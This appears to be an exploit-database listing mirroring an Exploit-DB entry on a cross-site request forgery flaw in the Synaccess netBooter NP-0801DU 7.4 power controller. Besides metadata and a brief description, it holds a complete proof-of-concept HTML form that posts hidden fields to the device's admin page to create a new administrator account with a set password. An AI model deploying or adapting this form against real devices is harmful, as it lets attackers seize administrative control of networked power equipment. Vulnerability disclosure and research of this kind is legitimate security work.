header-logo
Suggest Exploit
vendor:
Unknown
by:
Gjoko 'LiquidWorm' Krstic
N/A
CVSS
N/A
Cross-Site Request Forgery (Add Admin)
Unknown
CWE
Product Name: Unknown
Affected Version From: NP-0801DU (HW6.0 BL1.5 FW7.23 WF7.4)
Affected Version To: Unknown
Patch Exists: Unknown
Related CWE:
CPE: Unknown
Metasploit:
Other Scripts:
Platforms Tested: Synaccess server
2018

Synaccess netBooter NP-0801DU 7.4 – Cross-Site Request Forgery (Add Admin)

The application interface allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certai actions with administrative privileges if a logged-in user visits a malicious web site.

Mitigation:

Unknown
Source

Exploit-DB raw data:

# Title: Synaccess netBooter NP-0801DU 7.4 - Cross-Site Request Forgery (Add Admin)
# Author: Gjoko 'LiquidWorm' Krstic @zeroscience
# Exploit Date: 2018-11-17
# Vendor: Synaccess Networks Inc.
# Product web page: https://www.synaccess-net.com
# Affected version: NP-0801DU (HW6.0 BL1.5 FW7.23 WF7.4)
# Tested on: Synaccess server
# CVE: N/A
# Advisory ID: ZSL-2018-5501
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5501.php

# Desc: The application interface allows users to perform certain
# actions via HTTP requests without performing any validity checks
# to verify the requests. This can be exploited to perform certai
# actions with administrative privileges if a logged-in user visits
# a malicious web site.

<html>
  <body>
   <form action="http://10.0.0.19:8082/adm.htm" method="POST">
     <input type="hidden" name="add1" value="Nimda" />
     <input type="hidden" name="add2" value="123456" />
     <input type="hidden" name="add3" value="123456" />
     <input type="hidden" name="adm0" value="1" />
     <input type="submit" value="Gou" />
   </form>
  </body>
</html>

Navigation

Suggest Exploit

Services By CQR